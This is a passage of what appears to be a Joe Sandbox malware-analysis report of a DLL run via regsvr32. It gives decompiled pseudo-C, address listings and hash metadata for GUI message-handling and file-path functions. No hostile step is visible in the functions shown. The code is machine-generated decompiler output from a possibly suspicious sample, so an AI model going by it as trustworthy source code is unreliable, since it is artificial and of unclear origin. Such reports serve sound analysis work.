Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 2e1cfd14d36694fa5377ceb24a8feb4c8711a4a8e9abad8071f54aa78b3d79f2
Instruction ID: ab04b333b1ee95674dc45df974ef924abd0ea2dd43eb25ff2de0b1c206d9cb0b
Opcode Fuzzy Hash: 2e1cfd14d36694fa5377ceb24a8feb4c8711a4a8e9abad8071f54aa78b3d79f2
Instruction Fuzzy Hash: D1B00239458214FFEF126B50DD4494FBFA2FB88365F20C958F5AA51035C7328420EB02

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 100464D4 Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 323
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E100464D4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t114;
				signed int _t115;
				signed int _t116;
				signed int _t118;
				intOrPtr _t122;
				long _t131;
				signed int _t138;
				signed int _t139;
				void* _t143;
				signed int _t147;
				signed int _t148;
				void* _t156;
				intOrPtr* _t163;
				signed int _t175;
				signed int _t176;
				signed int _t179;
				void* _t181;
				signed short _t190;
				intOrPtr _t192;
				void* _t200;
				void* _t204;
				void* _t205;
				void* _t207;

				_t165 = __ecx;
				_push(0x7c);
				_t109 = E1004764D(0x10091aa8, __ebx, __edi, __esi);
				_t200 = __ecx;
				 *(_t204 - 0x10) = __ecx;
				_t163 =  *((intOrPtr*)(_t204 + 8));
				_t190 =  *(_t163 + 4);
				 *(_t204 - 0x1c) = _t190;
				if(_t190 == 0x200 || _t190 == 0xa0 || _t190 == 0x202 || _t190 == 0x205 || _t190 == 0x208) {
					if(GetKeyState(1) < 0 || GetKeyState(2) < 0) {
						L49:
						_t190 =  *(_t204 - 0x1c);
						goto L50;
					} else {
						_t109 = GetKeyState(4);
						_t217 = _t109;
						if(_t109 < 0) {
							goto L49;
						} else {
							_t114 = E1001E375(_t163, _t165, GetKeyState, _t200, _t217);
							_push( *_t163);
							_t192 = _t114;
							 *((intOrPtr*)(_t204 - 0x18)) = _t192;
							while(1) {
								_t109 = E10013FEA(_t163, _t165, _t204);
								if(_t109 == 0) {
									break;
								}
								__eflags =  *(_t109 + 0x3c) & 0x00000401;
								if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
									break;
								} else {
									_push(GetParent( *(_t109 + 0x20)));
									continue;
								}
							}
							if(_t109 == _t200) {
								_t164 =  *(_t192 + 0x3c);
								_t115 = E10014305(_t200);
								__eflags = _t164;
								 *(_t204 - 0x14) = _t115;
								if(__eflags == 0) {
									L19:
									_t116 = E10009F14(__eflags, 0x70);
									 *(_t204 - 0x1c) = _t116;
									_t164 = 0;
									__eflags = _t116;
									 *(_t204 - 4) = 0;
									if(__eflags != 0) {
										_t164 = E10045F69(0, _t116, _t192, _t200, __eflags);
									}
									 *(_t204 - 4) =  *(_t204 - 4) | 0xffffffff;
									_t118 =  *((intOrPtr*)( *_t164 + 0x134))( *(_t204 - 0x14), 1);
									__eflags = _t118;
									if(_t118 != 0) {
										SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
										_t200 =  *(_t204 - 0x10);
										 *(_t192 + 0x3c) = _t164;
										L24:
										E10049170(_t192, _t204 - 0x88, 0, 0x30);
										_t122 =  *((intOrPtr*)(_t204 + 8));
										 *((intOrPtr*)(_t204 - 0x24)) =  *((intOrPtr*)(_t122 + 0x18));
										 *(_t204 - 0x28) =  *(_t122 + 0x14);
										ScreenToClient( *(_t200 + 0x20), _t204 - 0x28);
										E10049170(_t192, _t204 - 0x58, 0, 0x30);
										_t207 = _t205 + 0x18;
										 *(_t204 - 0x58) = 0x28;
										_t109 =  *((intOrPtr*)( *_t200 + 0x6c))( *(_t204 - 0x28),  *((intOrPtr*)(_t204 - 0x24)), _t204 - 0x58);
										asm("sbb ecx, ecx");
										_t175 =  ~(_t109 + 1) & _t200;
										__eflags =  *(_t192 + 0x44) - _t109;
										 *(_t204 - 0x1c) = _t109;
										 *(_t204 - 0x14) = _t175;
										if( *(_t192 + 0x44) != _t109) {
											L30:
											__eflags = _t109 - 0xffffffff;
											if(_t109 == 0xffffffff) {
												SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
												L39:
												E1004628A(_t164,  *((intOrPtr*)(_t204 + 8)));
												_t131 =  *(_t192 + 0x48);
												__eflags = _t131;
												if(_t131 != 0) {
													__eflags =  *_t131 - 0x28;
													if( *_t131 >= 0x28) {
														SendMessageA( *(_t164 + 0x20), 0x405, 0, _t131);
													}
												}
												__eflags =  *(_t192 + 0x48);
												 *(_t192 + 0x40) =  *(_t204 - 0x14);
												 *(_t192 + 0x44) =  *(_t204 - 0x1c);
												if(__eflags == 0) {
													 *(_t192 + 0x48) = E10009F14(__eflags, 0x30);
													E10049170(_t192, _t134, 0, 0x30);
													_t207 = _t207 + 0x10;
												}
												_t176 = 0xc;
												_t200 = _t204 - 0x58;
												_t109 = memcpy( *(_t192 + 0x48), _t200, _t176 << 2);
												_t192 = _t200 + _t176 + _t176;
												L45:
												__eflags =  *((intOrPtr*)(_t204 - 0x34)) - 0xffffffff;
												if( *((intOrPtr*)(_t204 - 0x34)) != 0xffffffff) {
													__eflags =  *(_t204 - 0x38);
													if(__eflags == 0) {
														_push( *((intOrPtr*)(_t204 - 0x34)));
														_t109 = E100470E9(_t164, _t192, _t200, __eflags);
													}
												}
												goto L77;
											}
											_t179 = 0xc;
											_t138 = memcpy(_t204 - 0x88, _t204 - 0x58, _t179 << 2);
											_t207 = _t207 + 0xc;
											_t181 =  *(_t204 - 0x10);
											_t139 = _t138 & 0x3fffffff;
											__eflags =  *(_t181 + 0x3c) & 0x00000400;
											 *(_t204 - 0x84) = _t139;
											if(( *(_t181 + 0x3c) & 0x00000400) != 0) {
												_t148 = _t139 | 0x00000020;
												__eflags = _t148;
												 *(_t204 - 0x84) = _t148;
											}
											SendMessageA( *(_t164 + 0x20), 0x404, 0, _t204 - 0x88);
											__eflags =  *(_t204 - 0x54) & 0x40000000;
											if(( *(_t204 - 0x54) & 0x40000000) != 0) {
												L35:
												SendMessageA( *(_t164 + 0x20), 0x401, 1, 0);
												_t143 =  *(_t204 - 0x10);
												__eflags =  *(_t143 + 0x3c) & 0x00000400;
												if(( *(_t143 + 0x3c) & 0x00000400) != 0) {
													SendMessageA( *(_t164 + 0x20), 0x411, 1, _t204 - 0x88);
												}
												SetWindowPos( *(_t164 + 0x20), 0, 0, 0, 0, 0, 0x213);
												goto L38;
											} else {
												_t147 = L10016A68(_t164,  *(_t204 - 0x10), 0x400);
												__eflags = _t147;
												if(_t147 == 0) {
													L38:
													_t192 =  *((intOrPtr*)(_t204 - 0x18));
													goto L39;
												}
												goto L35;
											}
										}
										__eflags =  *(_t192 + 0x40) - _t175;
										if( *(_t192 + 0x40) != _t175) {
											goto L30;
										}
										__eflags =  *(_t200 + 0x3c) & 0x00000400;
										if(( *(_t200 + 0x3c) & 0x00000400) == 0) {
											__eflags = _t109 - 0xffffffff;
											if(_t109 != 0xffffffff) {
												_t109 = E1004628A(_t164,  *((intOrPtr*)(_t204 + 8)));
											}
										} else {
											GetCursorPos(_t204 - 0x20);
											_t109 = SendMessageA( *(_t164 + 0x20), 0x412, 0, ( *(_t204 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t204 - 0x20) & 0x0000ffff);
										}
										goto L45;
									} else {
										_t109 =  *((intOrPtr*)( *_t164 + 4))(1);
										goto L77;
									}
								}
								_t156 = E100155FD(_t164);
								__eflags = _t156 -  *(_t204 - 0x14);
								if(_t156 !=  *(_t204 - 0x14)) {
									 *((intOrPtr*)( *_t164 + 0x60))();
									 *((intOrPtr*)( *_t164 + 4))(1);
									_t164 = 0;
									__eflags = 0;
									 *(_t192 + 0x3c) = 0;
								}
								__eflags = _t164;
								if(__eflags != 0) {
									goto L24;
								} else {
									goto L19;
								}
							} else {
								if(_t109 == 0) {
									 *(_t192 + 0x40) =  *(_t192 + 0x40) & _t109;
									 *(_t192 + 0x44) =  *(_t192 + 0x44) | 0xffffffff;
								}
								goto L77;
							}
						}
					}
				} else {
					L50:
					__eflags =  *(_t200 + 0x3c) & 0x00000401;
					if(( *(_t200 + 0x3c) & 0x00000401) == 0) {
						L77:
						return E10047725(_t109);
					}
					_push( *_t163);
					while(1) {
						_t109 = E10013FEA(_t163, _t165, _t204);
						__eflags = _t109;
						if(_t109 == 0) {
							break;
						}
						__eflags = _t109 - _t200;
						if(_t109 == _t200) {
							L57:
							__eflags = _t190 - 0x100;
							if(_t190 < 0x100) {
								L59:
								__eflags = _t190 - 0x104 - 3;
								if(_t190 - 0x104 > 3) {
									_t109 = 0;
									__eflags = 0;
									L62:
									__eflags =  *(_t200 + 0x3c) & 0x00000400;
									if(( *(_t200 + 0x3c) & 0x00000400) != 0) {
										goto L77;
									}
									__eflags = _t109;
									if(__eflags != 0) {
										L76:
										_t109 = L100129EF(_t165, __eflags, _t109);
										goto L77;
									}
									__eflags = _t190 - 0x201;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x203;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x204;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x206;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x207;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x209;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa1;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa3;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa4;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa6;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa7;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa9;
									if(__eflags != 0) {
										goto L77;
									}
									goto L76;
								}
								L60:
								_t109 = 1;
								goto L62;
							}
							__eflags = _t190 - 0x109;
							if(_t190 <= 0x109) {
								goto L60;
							}
							goto L59;
						}
						__eflags =  *(_t109 + 0x3c) & 0x00000401;
						if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
							break;
						}
						_push(GetParent( *(_t109 + 0x20)));
					}
					__eflags = _t109 - _t200;
					if(_t109 != _t200) {
						goto L77;
					}
					goto L57;
				}
			}

0x100464d4
0x100464d4
0x100464db
0x100464e0
0x100464e2
0x100464e5
0x100464e8
0x100464f1
0x100464f4
0x10046527
0x10046814
0x10046814
0x00000000
0x1004653a
0x1004653c
0x1004653e
0x10046541
0x00000000
0x10046547
0x10046547
0x1004654c
0x1004654e
0x10046550
0x10046567
0x10046567
0x1004656e
0x00000000
0x00000000
0x10046555
0x1004655b
0x00000000
0x1004655d
0x10046566
0x00000000
0x10046566
0x1004655b
0x10046572
0x10046588
0x1004658d
0x10046592
0x10046594
0x10046597
0x100465be
0x100465c0
0x100465c6
0x100465c9
0x100465cb
0x100465cd
0x100465d0
0x100465d9
0x100465d9
0x100465dd
0x100465e8
0x100465ee
0x100465f0
0x1004660c
0x10046612
0x10046615
0x10046618
0x10046623
0x10046628
0x10046634
0x1004663e
0x10046641
0x1004664f
0x10046656
0x10046665
0x1004666c
0x10046674
0x10046676
0x10046678
0x1004667b
0x1004667e
0x10046681
0x100466d4
0x100466d4
0x100466d7
0x10046809
0x10046782
0x10046786
0x1004678b
0x10046790
0x10046792
0x10046794
0x10046797
0x100467a3
0x100467a3
0x10046797
0x100467a9
0x100467af
0x100467b5
0x100467b8
0x100467c5
0x100467c8
0x100467cd
0x100467cd
0x100467d5
0x100467d6
0x100467d9
0x100467d9
0x100467db
0x100467db
0x100467df
0x100467e5
0x100467e9
0x100467ef
0x100467f2
0x100467f7
0x100467e9
0x00000000
0x100467df
0x100466e2
0x100466ec
0x100466ec
0x100466ee
0x100466f1
0x100466fb
0x100466fe
0x10046704
0x10046706
0x10046706
0x10046709
0x10046709
0x10046721
0x10046727
0x1004672e
0x1004673c
0x10046747
0x1004674d
0x10046750
0x10046753
0x10046766
0x10046766
0x10046779
0x00000000
0x10046730
0x10046733
0x10046738
0x1004673a
0x1004677f
0x1004677f
0x00000000
0x1004677f
0x00000000
0x1004673a
0x1004672e
0x10046683
0x10046686
0x00000000
0x00000000
0x10046688
0x1004668e
0x100466bd
0x100466c0
0x100466ca
0x100466ca
0x10046690
0x10046694
0x100466b2
0x100466b2
0x00000000
0x100465f2
0x100465f8
0x00000000
0x100465f8
0x100465f0
0x1004659b
0x100465a0
0x100465a3
0x100465a9
0x100465b2
0x100465b5
0x100465b5
0x100465b7
0x100465b7
0x100465ba
0x100465bc
0x00000000
0x00000000
0x00000000
0x00000000
0x10046574
0x10046576
0x1004657c
0x1004657f
0x1004657f
0x00000000
0x10046576
0x10046572
0x10046541
0x10046817
0x10046817
0x10046817
0x1004681d
0x100468e2
0x100468e7
0x100468e7
0x10046823
0x1004683d
0x1004683d
0x10046842
0x10046844
0x00000000
0x00000000
0x10046827
0x10046829
0x1004684e
0x1004684e
0x10046854
0x1004685e
0x10046864
0x10046867
0x1004686e
0x1004686e
0x10046870
0x10046870
0x10046876
0x00000000
0x00000000
0x10046878
0x1004687a
0x100468dc
0x100468dd
0x00000000
0x100468dd
0x1004687c
0x10046882
0x00000000
0x00000000
0x10046884
0x1004688a
0x00000000
0x00000000
0x1004688c
0x10046892
0x00000000
0x00000000
0x10046894
0x1004689a
0x00000000
0x00000000
0x1004689c
0x100468a2
0x00000000
0x00000000
0x100468a4
0x100468aa
0x00000000
0x00000000
0x100468ac
0x100468b2
0x00000000
0x00000000
0x100468b4
0x100468ba
0x00000000
0x00000000
0x100468bc
0x100468c2
0x00000000
0x00000000
0x100468c4
0x100468ca
0x00000000
0x00000000
0x100468cc
0x100468d2
0x00000000
0x00000000
0x100468d4
0x100468da
0x00000000
0x00000000
0x00000000
0x100468da
0x10046869
0x1004686b
0x00000000
0x1004686b
0x10046856
0x1004685c
0x00000000
0x00000000
0x00000000
0x1004685c
0x1004682b
0x10046831
0x00000000
0x00000000
0x1004683c
0x1004683c
0x10046846
0x10046848
0x00000000
0x00000000
0x00000000
0x10046848

APIs

__EH_prolog3.LIBCMT ref: 100464DB
GetKeyState.USER32(00000001), ref: 10046522
GetKeyState.USER32(00000002), ref: 1004652F
GetKeyState.USER32(00000004), ref: 1004653C
GetParent.USER32(?), ref: 10046560
SendMessageA.USER32 ref: 1004660C
_memset.LIBCMT ref: 10046623
ScreenToClient.USER32(?,?), ref: 10046641
_memset.LIBCMT ref: 1004664F
GetCursorPos.USER32(?), ref: 10046694
SendMessageA.USER32 ref: 100466B2
SendMessageA.USER32 ref: 10046721
SendMessageA.USER32 ref: 10046747
SendMessageA.USER32 ref: 10046766
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 10046779
SendMessageA.USER32 ref: 100467A3
_memset.LIBCMT ref: 100467C8
SendMessageA.USER32 ref: 10046809
GetParent.USER32(?), ref: 10046836

Strings

(, xrefs: 10046665

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$State_memset$Parent$ClientCursorH_prolog3ScreenWindow
String ID: (
API String ID: 2864161637-3887548279
Opcode ID: 31d1df7e4435b8c7c62589e1067a515024d66b0d3f0c6acff1097924728d2432
Instruction ID: 4716ce11059b1d6aff665851ae5c4938c3b5f43c6bbf43757ff83e482e918513
Opcode Fuzzy Hash: 31d1df7e4435b8c7c62589e1067a515024d66b0d3f0c6acff1097924728d2432
Instruction Fuzzy Hash: FAC18DB1A00616DBEB50CFA4CC85B9D77B5EF08750F214279E905EB1A1EB71A840CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 10043612 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 163
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10043612(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				struct tagPOINT _v28;
				intOrPtr _v40;
				signed int _v72;
				char _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				signed int _t62;
				signed int _t63;
				signed int _t67;
				signed int _t70;
				intOrPtr _t72;
				signed int _t79;
				short _t80;
				short _t87;
				short _t92;
				intOrPtr _t111;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr* _t118;

				_t115 = _a4;
				_t118 = __ecx;
				if(E10011BA4(__ecx, __eflags, _t115) == 0) {
					_t116 =  *((intOrPtr*)(_t115 + 4));
					_push(__ebx);
					_t100 = __ecx;
					_t60 = E100155FD(__ecx);
					__eflags =  *(__ecx + 0x80) & 0x00000020;
					_v20 = _t60;
					if(( *(__ecx + 0x80) & 0x00000020) != 0) {
						L5:
						__eflags = _t116 - 0x200;
						if(_t116 < 0x200) {
							L7:
							__eflags = _t116 - 0xa0 - 9;
							if(__eflags > 0) {
								L30:
								_t62 = L10014BA7(_t118);
								__eflags = _t62;
								if(_t62 == 0) {
									L32:
									__eflags = _v20;
									if(_v20 == 0) {
										L35:
										_t63 = IsWindow( *(_t118 + 0x20));
										__eflags = _t63;
										if(_t63 == 0) {
											L37:
											__eflags = 0;
											return 0;
										}
										return E10012240(_a4);
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t117 = _v20;
										_t67 =  *((intOrPtr*)( *_v20 + 0x100))(_a4);
										__eflags = _t67;
										if(_t67 != 0) {
											goto L1;
										}
										_t70 = L10014B68(_t117);
										__eflags = _t70;
										_v20 = _t70;
										if(_t70 != 0) {
											continue;
										}
										goto L35;
									}
									goto L1;
								}
								__eflags =  *(_t62 + 0x68);
								if( *(_t62 + 0x68) != 0) {
									goto L37;
								}
								goto L32;
							}
							L8:
							_v16 = E1001E375(0x201, _t100, _t116, _t118, __eflags);
							_t72 = _a4;
							_v28.y =  *((intOrPtr*)(_t72 + 0x18));
							_v28.x =  *(_t72 + 0x14);
							ScreenToClient( *(_t118 + 0x20),  &_v28);
							E10049170(_t116,  &_v76, 0, 0x30);
							_v76 = 0x28;
							_t79 =  *((intOrPtr*)( *_t118 + 0x6c))(_v28.x, _v28.y,  &_v76);
							__eflags = _v40 - 0xffffffff;
							_v8 = _t79;
							if(__eflags != 0) {
								_push(_v40);
								E100470E9(0x201, _t116, _t118, __eflags);
							}
							__eflags = _t116 - 0x201;
							if(_t116 != 0x201) {
								L13:
								_v12 = _v12 & 0x00000000;
								__eflags = _t116 - 0x201;
								if(_t116 != 0x201) {
									_t92 = GetKeyState(1);
									__eflags = _t92;
									if(_t92 < 0) {
										_v8 =  *((intOrPtr*)(_v16 + 0x4c));
									}
								}
								L16:
								__eflags = _v8;
								if(_v8 < 0) {
									L26:
									_t80 = GetKeyState(1);
									__eflags = _t80;
									if(_t80 >= 0) {
										L28:
										 *((intOrPtr*)( *_t118 + 0x164))(0xffffffff);
										KillTimer( *(_t118 + 0x20), 0xe001);
										L29:
										 *((intOrPtr*)(_v16 + 0x4c)) = _v8;
										goto L30;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L29;
									}
									goto L28;
								}
								__eflags = _v12;
								if(_v12 != 0) {
									goto L26;
								}
								__eflags = _t116 - 0x202;
								if(_t116 != 0x202) {
									__eflags =  *(_t118 + 0x7c) & 0x00000008;
									if(( *(_t118 + 0x7c) & 0x00000008) != 0) {
										L25:
										 *((intOrPtr*)( *_t118 + 0x164))(_v8);
										goto L29;
									}
									_t87 = GetKeyState(1);
									__eflags = _t87;
									if(_t87 < 0) {
										goto L25;
									}
									_t111 = _v16;
									__eflags = _v8 -  *((intOrPtr*)(_t111 + 0x4c));
									if(_v8 ==  *((intOrPtr*)(_t111 + 0x4c))) {
										goto L29;
									}
									_push(0x12c);
									_push(0xe000);
									L20:
									L10042CB1(_t118);
									goto L29;
								}
								 *((intOrPtr*)( *_t118 + 0x164))(0xffffffff);
								_push(0xc8);
								_push(0xe001);
								goto L20;
							}
							__eflags = _v72 & 0x80000000;
							if((_v72 & 0x80000000) == 0) {
								goto L13;
							}
							_v12 = 1;
							goto L16;
						}
						__eflags = _t116 - 0x209;
						if(__eflags <= 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t116 - 0x201;
					if(_t116 == 0x201) {
						goto L5;
					}
					__eflags = _t116 - 0x202;
					if(_t116 != 0x202) {
						goto L30;
					}
					goto L5;
				}
				L1:
				return 1;
			}

0x1004361a
0x1004361e
0x10043627
0x10043631
0x10043634
0x10043635
0x10043637
0x1004363c
0x10043643
0x1004364b
0x1004365d
0x1004365d
0x10043663
0x1004366d
0x10043673
0x10043676
0x100437b0
0x100437b2
0x100437b7
0x100437ba
0x100437c2
0x100437c2
0x100437c6
0x100437ee
0x100437f1
0x100437f7
0x100437f9
0x10043807
0x10043807
0x00000000
0x10043807
0x00000000
0x00000000
0x00000000
0x00000000
0x100437c8
0x100437c8
0x100437c8
0x100437d2
0x100437d8
0x100437da
0x00000000
0x00000000
0x100437e2
0x100437e7
0x100437e9
0x100437ec
0x00000000
0x00000000
0x00000000
0x100437ec
0x00000000
0x100437c8
0x100437bc
0x100437c0
0x00000000
0x00000000
0x00000000
0x100437c0
0x1004367c
0x10043681
0x10043684
0x1004368d
0x10043697
0x1004369a
0x100436a8
0x100436be
0x100436c5
0x100436c8
0x100436cc
0x100436cf
0x100436d1
0x100436d4
0x100436d9
0x100436da
0x100436dc
0x100436f0
0x100436f0
0x100436f4
0x100436f6
0x100436fa
0x10043700
0x10043703
0x1004370b
0x1004370b
0x10043703
0x1004370e
0x1004370e
0x10043712
0x1004377a
0x1004377c
0x10043782
0x10043785
0x1004378d
0x10043793
0x100437a1
0x100437a7
0x100437ad
0x00000000
0x100437ad
0x10043787
0x1004378b
0x00000000
0x00000000
0x00000000
0x1004378b
0x10043714
0x10043718
0x00000000
0x00000000
0x1004371a
0x10043720
0x10043741
0x10043745
0x1004376b
0x10043772
0x00000000
0x10043772
0x10043749
0x1004374f
0x10043752
0x00000000
0x00000000
0x10043757
0x1004375a
0x1004375d
0x00000000
0x00000000
0x1004375f
0x10043764
0x10043738
0x1004373a
0x00000000
0x1004373a
0x10043728
0x1004372e
0x10043733
0x00000000
0x10043733
0x100436de
0x100436e5
0x00000000
0x00000000
0x100436e7
0x00000000
0x100436e7
0x10043665
0x1004366b
0x00000000
0x00000000
0x00000000
0x1004366b
0x1004364d
0x1004364f
0x00000000
0x00000000
0x10043651
0x10043657
0x00000000
0x00000000
0x00000000
0x10043657
0x10043629
0x00000000

APIs

ScreenToClient.USER32(?,?), ref: 1004369A
_memset.LIBCMT ref: 100436A8
IsWindow.USER32(?), ref: 100437F1

Strings

(, xrefs: 100436BE

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ClientScreenWindow_memset
String ID: (
API String ID: 1268500159-3887548279
Opcode ID: 64ed9addaf683a1b86ec6b4ffff91413ac46c86aa955f030dd97174b6ef85283
Instruction ID: 62187ba6e2ba40476ccf44bbc32d417699c02d7eb00345c65f8ec2bcc569b145
Opcode Fuzzy Hash: 64ed9addaf683a1b86ec6b4ffff91413ac46c86aa955f030dd97174b6ef85283
Instruction Fuzzy Hash: 7C51BEB4A04245EFDB20DFA4C889B9DBBF1EF44350F329079E942E7291DB719A80CB45

Uniqueness

Uniqueness Score: -1.00%

Function 1002992A Relevance: 12.1, APIs: 8, Instructions: 129
filestringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1002992A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t38;
				long _t49;
				CHAR* _t50;
				CHAR* _t56;
				CHAR* _t59;
				void* _t61;
				int _t65;
				CHAR* _t74;
				void* _t75;
				void* _t76;
				void* _t89;
				void* _t90;
				CHAR* _t92;
				void* _t93;
				void* _t96;
				struct _WIN32_FIND_DATAA* _t98;
				void* _t100;
				CHAR* _t106;

				_t94 = __esi;
				_t90 = __edx;
				_t76 = __ecx;
				_t98 = _t100 - 0x13c;
				_t38 =  *0x100b9e70; // 0x6fb3f782
				 *(_t98 + 0x140) = _t38 ^ _t98;
				_push(0x14);
				E1004764D(0x1008ff07, __ebx, __edi, __esi);
				_t92 =  *(_t98 + 0x14c);
				_t74 =  *(_t98 + 0x150);
				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
				_t106 = _t92;
				_t107 = _t106 == 0;
				if(_t106 == 0) {
					L1:
					E1000A069(_t74, _t76, _t92, _t94, _t107);
				}
				if((0 | _t74 != 0x00000000) == 0) {
					goto L1;
				}
				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t98 - 0x14);
				if(_t49 != 0) {
					__eflags = _t49 - 0x104;
					if(_t49 >= 0x104) {
						goto L5;
					} else {
						L1000140B(_t98 - 0x10, E100184C0());
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						E10029760(_t74, _t98, __eflags, _t92, _t98 - 0x10);
						_t56 = PathIsUNCA( *(_t98 - 0x10));
						__eflags = _t56;
						if(_t56 != 0) {
							L19:
							L100013E3( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
							_t50 = 1;
							__eflags = 1;
						} else {
							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t98 - 0x20, _t98 - 0x1c, _t56, _t56);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags =  *(_t98 - 0x1c) & 0x00000002;
								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
									CharUpperA(_t92);
								}
								__eflags =  *(_t98 - 0x1c) & 0x00000004;
								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
									goto L19;
								} else {
									_t61 = FindFirstFileA(_t74, _t98);
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										goto L19;
									} else {
										FindClose(_t61);
										__eflags =  *(_t98 - 0x14);
										if( *(_t98 - 0x14) == 0) {
											goto L10;
										} else {
											__eflags =  *(_t98 - 0x14) - _t92;
											if( *(_t98 - 0x14) <= _t92) {
												goto L10;
											} else {
												_t65 = lstrlenA( &(_t98->cFileName));
												_t89 =  *(_t98 - 0x14) - _t92;
												__eflags = _t65 + _t89 - 0x104;
												if(_t65 + _t89 >= 0x104) {
													goto L10;
												} else {
													_t97 = 0x104 - _t89;
													__eflags = 0x104 - _t89;
													E10019530(_t74, _t90, _t92, 0x104 - _t89, _t98,  *(_t98 - 0x14), _t97,  &(_t98->cFileName));
													goto L19;
												}
											}
										}
									}
								}
							} else {
								_push(_t74);
								E100298FF( *((intOrPtr*)(_t98 - 0x18)));
								L10:
